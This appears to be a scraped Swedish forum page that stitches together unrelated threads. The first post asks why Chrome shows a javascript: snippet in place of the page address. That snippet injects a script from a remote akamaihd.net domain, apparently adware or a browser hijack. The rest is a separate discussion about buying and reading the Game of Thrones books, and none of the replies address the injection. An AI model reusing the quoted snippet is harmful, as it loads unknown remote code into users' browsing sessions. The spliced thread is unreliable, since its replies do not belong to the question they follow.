webläsare byter länken till javascript
tjena, har märkt detta då jag ofta länkar saker i mumble till polare som jag sitter med, att google chrome byter ut länken jag sitter på mot javascript bla bla bla
just nu sitter jag på soundcloud men länken som står4 i webläsaren är : javascript:try{if(document.body.innerHTML){var a=document.getElementsByTagName("head");if(a.length){var d=document.createElement("script");d.src="https://apiframeddisplay-a.akamaihd.net/gsrs?is=&bp=BA&g=;a[0].appendChild(d);}}}catch(e){}
och länken är detsamma även fasst jag refreshar sidan, hur får jagh bort denna skit ??? tack för all hjälp!
Annars kan du köpa på tex cdon.com
http://www.bokus.com/bok/97800 07477166/a-game-of-thrones-6-b ooks-box-set /
thx 4 svar
får se hur länge motivitationen håller
fast det blir nog som #4 :]
Annars går du till akademibokhandeln (om du har coop-kort) eller till bokia och köper böckerna. Ingen raketforskning precis.
Ett bra tips är att om du inte har något mot att läsa i pocketformat köper det istället för en vanlig "hård" bok, du kan komma ner kraftigt i pris då, så kolla alltid först en extra gång om böckerna finns som pocket!
Skrivet med min Android-mobil
Skrivet med min iPhone
http://www.adlibris.com/se/pro duct.aspx?isbn=0345540565
thx all!
6 första eng version (299kr?)
känns nice! visade sig att jag faktiskt har intresse för att läsa sålänge boken intresserar
135 sidor in nu
Fan märker nu hur mycket skolan dödar läslusten
det är ju väldigt underhållande att läsa
Du har måååååånga timmar med grym läsning framför dig, jag är rätt avis på dig faktiskt. Jag önskar att jag kunde radera böckerna ur mitt minne så jag kunde läsa om dom helt...
Har du läst alla 6 böckerna eller? :o
Man önskar ju att man tog upp det här med böcker lite tidigare, de ju minst lika spännande som att följa en tv-serie :]
150 sidor in nu
nu blir de mat>gymmet>gaming så fortsätter jag ikväll
thx all
Läste nonstop tills jag kom till typ halvvägs genom 5an i somras och sen tog jag en paus. Måste ta upp boken igen.
Ja, eller när jag läste dom så var inte trean uppdelad i två så egentligen har jag bara läst fem. ^_^
Absolut, i typ hela mitt liv har jag läst en stund innan jag ska sova, det är det bästa sättet att koppla av och bli trött på. Dessutom så blir man ju smartare och mer språkbegåvad av att läsa, det finns bara fördelar.
Keep it up! :)
#25 Idd, har samma problem men man märker att när väl rätt bok dyker upp smyger sig även läslusten fram, och asoiaf är definitionen av en riktigt bra bok!
Börja med att köpa första boken. Köp inte pocket, jobbigt att läsa!
Läste sista delen av Harry Potter på en eftermiddag, snacka om besviken man blev sen, suttit och väntat i typ ett år och sen drar man igenom skiten på ett par timmar.
Läste alla Väktarna och Vargbröder förutom de respektiva sista delarna, tog en paus, kom aldrig tillbaka i läsandet - och båda dessa böcker ligger och väntar på mig.
Ska nog ta och låna hem Game of Thrones böckerna, tv-serien är fantastisk, det får en att undra hur briljant böckerna kommer vara. Tack för den indirekta påminnelsen, #0.
Dude, jag är way before your time.
Om tv-serien är 9/10 så är böckerna typ 55/10. Sen kan jag rekommendera att du kollar om serien efter att du läst böckerna, det gör serien hundra gånger bättre!
Runescape2007 någon?:-d